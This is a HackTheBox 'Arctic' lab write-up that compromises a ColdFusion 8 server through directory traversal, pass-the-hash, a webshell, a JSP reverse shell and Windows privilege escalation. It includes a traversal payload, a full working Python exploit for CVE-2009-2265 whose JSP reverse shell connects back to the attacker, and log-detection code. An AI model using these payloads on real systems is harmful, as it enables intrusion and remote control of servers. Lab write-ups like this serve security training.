HackTheBox: Arctic

midist0xf
10 min read, Jan 28, 2021

ENUMERATION

Nmap full TCP scan

nmap -A -p- -oN nmap_tcp_all.txt 10.10.10.11

The nmap output highlighted the presence of:

  • fmtp? on port 8500.
  • msrpc on ports 135 and 49154: Microsoft Windows RPC.

The first thing I tried was browsing to http://10.10.10.11:8500, but it was taking too long, so I thought no web server was running on the target 🙃.

Until then I had never heard of fmtp, so I searched for more information about this unusual service. From Eurocontrol:

Flight Message Transfer Protocol (FMTP) is a communication stack based on the transmission control and internet protocols (TCP/IP). It is used in a peer-to-peer communication context for the information exchange between flight data processing systems for the purpose of notification, coordination and transfer of flights between air traffic control units and for the purposes of civil-military cooperation.

The next step was to look for vulnerabilities in this protocol.

The results didn’t seem helpful at all. The last resort was trying a null session login with rpcclient. It was another bust.

As a reminder about the meaning of ?, from the nmap website:

The question mark tells us that Nmap was not even able to determine the service name through probing. As a fallback, rndc is mentioned because that has port 953 registered in nmap-services.

That means that fmtp was just a guess. I decided to open a tab, enter http://10.10.10.11:8500 as the URL again and wait while I re-ran the port scans to be sure that no ports had been missed the first time... a web server hosting ColdFusion was running on the target 😬.

Since I had already faced ColdFusion in another lab, I knew the /CFIDE/ directory was related to it and that in some versions you can extract the admin hash using Local File Inclusion. The plan was: get the hash, log in as admin, look for authenticated RCE.
Browsing to 10.10.10.11:8500/CFIDE/administrator/ revealed the installed version: ColdFusion 8.

EXPLOITATION

searchsploit showed that several vulnerabilities exist for this framework.

However, many of the results relate to XSS or to other ColdFusion versions. I filtered them out with:

searchsploit coldfusion 8 | grep -v -e Cross -e Allaire -e Database -e BlazeDS -e Credential -e Development

This left the following list of candidates:

  1. Adobe ColdFusion — Directory Traversal

EDB-ID: 14641

The exploit tries to retrieve the admin hash by exploiting CVE-2010-2861. The payload is:

locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en

EDB-ID: 16985 (msf)

Metasploit module which leverages CVE-2010-2861 to extract the admin hash and then reaches RCE using a scheduled task.

  2. Arbitrary File Upload

EDB-ID: 45979

A text file showing how to upload a shell by exploiting CVE-2018-15961. The vulnerable path is /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm.

EDB-ID: 16788 (msf)

Metasploit module which leverages CVE-2009-2265 to upload a payload. The upload path is:

/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm

Directory traversal

I went down the path I had already used before, and the administrator hash was retrieved using the payload indicated in EDB-ID: 14641.

http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
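The three request shapes listed above (the enter.cfm locale traversal, the FCKeditor connector upload and the CKEditor filemanager upload) are easy to spot in web server access logs. The following detection script is an added example, not part of the original post; the log lines and the client IP 10.10.14.5 are constructed samples, and the log format is assumed to be common log format.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines: one benign request followed by one
# request per ColdFusion 8 technique the write-up walks through.
SAMPLE_LOG = """\
10.10.14.5 - - [28/Jan/2021:10:01:02 +0000] "GET /CFIDE/administrator/enter.cfm HTTP/1.1" 200 5120
10.10.14.5 - - [28/Jan/2021:10:01:09 +0000] "GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en HTTP/1.1" 200 812
10.10.14.5 - - [28/Jan/2021:10:04:31 +0000] "POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&CurrentFolder=/X7Q2.jsp%00&Type=File HTTP/1.1" 200 64
10.10.14.5 - - [28/Jan/2021:10:05:02 +0000] "POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm?path=/ HTTP/1.1" 200 64
"""

# Minimal common-log-format parser (assumed format for the constructed sample).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d+)'
)

def classify(url):
    """Return a rule name if the request matches one of the three exploitation
    paths from the write-up, else None. parse_qs decodes %00 into a NUL byte."""
    parts = urlsplit(url)
    path = parts.path.lower()
    query = parse_qs(parts.query, keep_blank_values=True)
    if path.endswith('/cfide/administrator/enter.cfm'):
        locale = query.get('locale', [''])[0]
        # CVE-2010-2861: traversal plus a NUL byte to cut off the locale suffix
        if '..' in locale or '\x00' in locale:
            return 'CVE-2010-2861 locale traversal'
    if path.endswith('/fckeditor/editor/filemanager/connectors/cfm/upload.cfm'):
        folder = query.get('CurrentFolder', [''])[0]
        # CVE-2009-2265: CurrentFolder abused to pick the stored name and extension
        if '\x00' in folder or re.search(r'\.(jsp|cfm)', folder, re.I):
            return 'CVE-2009-2265 FCKeditor upload'
    if path.endswith('/ckeditor/plugins/filemanager/upload.cfm'):
        # CVE-2018-15961: any hit on this unauthenticated upload path is worth review
        return 'CVE-2018-15961 CKEditor upload'
    return None

def scan_log(text):
    """Return (ip, timestamp, rule) for every log line matching a rule."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        rule = classify(m.group('url'))
        if rule:
            hits.append((m.group('ip'), m.group('ts'), rule))
    return hits
```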

Identify the hash type

At this point there were two ways to use the hash: crack it, or pass it. To identify a hash type I usually use hashid, hash-identifier, or the framework documentation to look up the default configuration.

Both hashid and hash-identifier indicated that the hash was computed using SHA1 (which should be avoided, as reported by Schneier).

Crack the hash

The cleartext password was easily found using online rainbow tables: happyday.

In this scenario the password was simple, already cracked and available on the web. Suppose instead the password was complex and you couldn’t crack it. There is another way to gain admin access to ColdFusion, leveraging the Pass The Hash technique: you don’t need the cleartext password, you can reuse the extracted hash.

Pass The Hash

If you read the source code of the /CFIDE/administrator login page, on the POST action the admin password value is computed as the HMAC of the salt and the SHA1 of the password.

The salt is passed as the key. The password SHA1 is passed as data.

sha1.js

The salt changes about every 30 seconds; as shown below, if you wait a while the hidden field value is different every time.

Since we could retrieve the password SHA1, it was possible to reuse the hash together with the salt. The goal was to quickly generate the following value and send it as the password.

cfadminPassword.value = hmac(current_salt, admin_SHA1_LFI)

Steps:

  1. Open Burp.
  2. Enter the extracted admin hash in the password field.
  3. Run javascript:hex_hmac_sha1(document.loginform.salt.value,document.loginform.cfadminPassword.value) in the browser console to generate the salted hash.
  4. Copy the newly generated hash.
  5. Turn intercept on, click the login button and modify the intercepted request, replacing the cfadminPassword value with the new one. Forward the request.
  6. You are now logged in as admin.
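The reason the salted HMAC offers no protection once the stored hash has leaked is that the server can only recompute the HMAC over the value it stores, so the stored SHA1 effectively becomes the password. The following model of the login computation is an added example, not code from the original post or from ColdFusion; it assumes the stored value is the uppercase hex SHA1 of the cleartext (the post only says the hash is SHA1) and uses a constructed sample salt.

```python
import hmac
import hashlib

def stored_hash(password: str) -> str:
    """Model of the value kept in password.properties: uppercase hex SHA1 of
    the cleartext (assumption made here; the post only says the hash is SHA1)."""
    return hashlib.sha1(password.encode()).hexdigest().upper()

def hex_hmac_sha1(key: str, data: str) -> str:
    """Same operation as hex_hmac_sha1 in sha1.js: HMAC-SHA1 with hex output."""
    return hmac.new(key.encode(), data.encode(), hashlib.sha1).hexdigest()

def login_value_from_password(password: str, salt: str) -> str:
    """What the legitimate login page computes: HMAC(salt, SHA1(password))."""
    return hex_hmac_sha1(salt, stored_hash(password))

def login_value_from_hash(leaked_hash: str, salt: str) -> str:
    """What step 3 of the procedure computes from the LFI-extracted hash alone."""
    return hex_hmac_sha1(salt, leaked_hash)

def server_accepts(submitted: str, salt: str, stored: str) -> bool:
    """Hypothetical server-side check: the server can only recompute the HMAC
    over the hash it stores, so anyone holding that hash passes."""
    expected = hex_hmac_sha1(salt, stored)
    return hmac.compare_digest(submitted, expected)

def demo() -> dict:
    salt = "1611828000000"        # constructed sample salt; the real one rotates
    stale_salt = "1611828030000"  # constructed: the value after rotation
    stored = stored_hash("happyday")
    from_password = login_value_from_password("happyday", salt)
    from_hash = login_value_from_hash(stored, salt)
    return {
        # the hash-derived value is indistinguishable from the password-derived one
        "same_value": from_password == from_hash,
        "accepted": server_accepts(from_hash, salt, stored),
        # the rotating salt only limits replay of an old value, not hash reuse
        "stale_salt_rejected": not server_accepts(from_hash, stale_salt, stored),
    }
```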

RCE

It was time to upload a webshell. Kali already ships a .cfm (ColdFusion Markup) version.

Since we needed to write the webshell to a file, the physical Directory Path of the /CFIDE Logical Path was noted so that the webshell could be reached from the browser.

C:\ColdFusion8\wwwroot\CFIDE\

A new scheduled task was created as follows:

The task was triggered by clicking on the green icon.

The shell was reachable at http://10.10.10.11:8500/CFIDE/shell.cfm .

Running just whoami didn’t work.

Another failed attempt with cmd absolute path.

Also with the output redirection I couldn’t see any output 😐.

Although pinging my system was working.

I also unsuccessfully tried both certutil to download nc.exe and powershell.exe to download and execute a reverse shell payload.

Server header

The server responses included the Server: JRun Web Server header.

According to the JRun and ColdFusion docs, the JRun server also serves JSP files.

So the next step was using a .jsp reverse shell instead of a .cfm webshell.

Triggering the reverse shell was really annoying because I had to try several times before it worked. Most of the time I got a Connection Timeout error. Finally it worked.

PRIVILEGE ESCALATION

JuicyPotato

whoami /priv indicated it was time for our beloved JuicyPotato.

Remember to transfer nc as well if you want to launch a reverse shell.

systeminfo

No patches were applied on this box, so kernel exploits were a potential PE vector.

OS Name: Microsoft Windows Server 2008 R2 Standard
OS Version: 6.1.7600 N/A Build 7600

MS10-059 aka Chimichurri

Among the exploits suggested by windows-exploit-suggester, this one worked.

MS10-092 (msf)

The privilege escalation was also possible using this Metasploit module, as shown by ippsec.

exploit/windows/local/ms10_092_schelevator

EXTRA

Since the arbitrary file upload exploit through FCKeditor didn’t seem complex, as an exercise I tried to write a Python version of it. The exploit uploads a .jsp reverse shell.

Usage

  1. Start a listener.
  2. Run the exploit.
  3. Browse to the reverse shell payload location.
  4. Receive the reverse shell.

POC

#!/usr/bin/python3
import requests
import sys
import string
import random
import urllib.parse

# Title: FCKeditor 'CurrentFolder' Parameter Arbitrary File Upload Vulnerability
# Tested on: ColdFusion 8
# CVE: 2009-2265
# Description: this exploit uploads a .jsp reverse shell leveraging FCKeditor.

if len(sys.argv) != 5:
    print('Usage: exploit.py <LHOST> <LPORT> <TARGET> <RPORT>')
    print('Example: exploit.py 10.10.10.10 445 http://10.10.10.11 8500')
    sys.exit(0)

lhost = sys.argv[1]
lport = sys.argv[2]
target = sys.argv[3]
rport = sys.argv[4]

# JSP reverse shell; LHOST_HERE and LPORT_HERE are substituted below.
payload = """
<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>

<%
class StreamConnector extends Thread {

    InputStream dj;
    OutputStream cr;

    StreamConnector(InputStream dj, OutputStream cr) {
        this.dj = dj;
        this.cr = cr;
    }

    public void run() {
        BufferedReader zf = null;
        BufferedWriter qhx = null;
        try {
            zf = new BufferedReader(new InputStreamReader(this.dj));
            qhx = new BufferedWriter(new OutputStreamWriter(this.cr));
            char buffer[] = new char[8192];
            int length;
            while ((length = zf.read(buffer, 0, buffer.length)) > 0) {
                qhx.write(buffer, 0, length);
                qhx.flush();
            }
        } catch (Exception e) {}
        try {
            if (zf != null)
                zf.close();
            if (qhx != null)
                qhx.close();
        } catch (Exception e) {}
    }
}

try {
    String ShellPath;
    if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
        ShellPath = new String("/bin/sh");
    } else {
        ShellPath = new String("cmd.exe");
    }

    Socket socket = new Socket("LHOST_HERE", LPORT_HERE);
    Process process = Runtime.getRuntime().exec(ShellPath);
    (new StreamConnector(process.getInputStream(), socket.getOutputStream())).start();
    (new StreamConnector(socket.getInputStream(), process.getOutputStream())).start();
} catch (Exception e) {}
%>
"""
payload = payload.replace("LHOST_HERE", lhost)
payload = payload.replace("LPORT_HERE", lport)

# Random names: the stored file takes its name from CurrentFolder, the
# uploaded file name itself only needs to look like a harmless .txt.
shell_name = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(10))
fake_filename = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(5))

upload_uri = target + ':' + rport + '/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm'
files = {'newfile': (fake_filename + '.txt', payload, 'application/x-java-archive')}
params = {'Command': 'FileUpload', 'CurrentFolder': '/' + shell_name + '.jsp%00', 'Type': 'File'}
# safe='%' keeps the %00 null byte from being encoded a second time
params_str = urllib.parse.urlencode(params, safe='%')

r = requests.post(upload_uri, params=params_str, files=files)

print('Reverse shell location:')
print(target + ':' + rport + '/CFIDE/usersfile/file/' + shell_name + '.jsp')

ColdFusion Useful Resources

ColdFusion for pentesters

LESSONS LEARNED

  • don’t rush... sometimes you need to wait.
  • service? in nmap output means that the scan wasn’t able to determine the service.
  • grep OR: grep -e pattern1 -e pattern2 filename
  • hashid and hash-identifier can help to identify a hash type.
  • crack the hash or pass the hash.
  • server response headers can give helpful information.
  • ColdFusion 8 interesting CVEs: CVE-2010-2861, CVE-2018-15961, CVE-2009-2265.
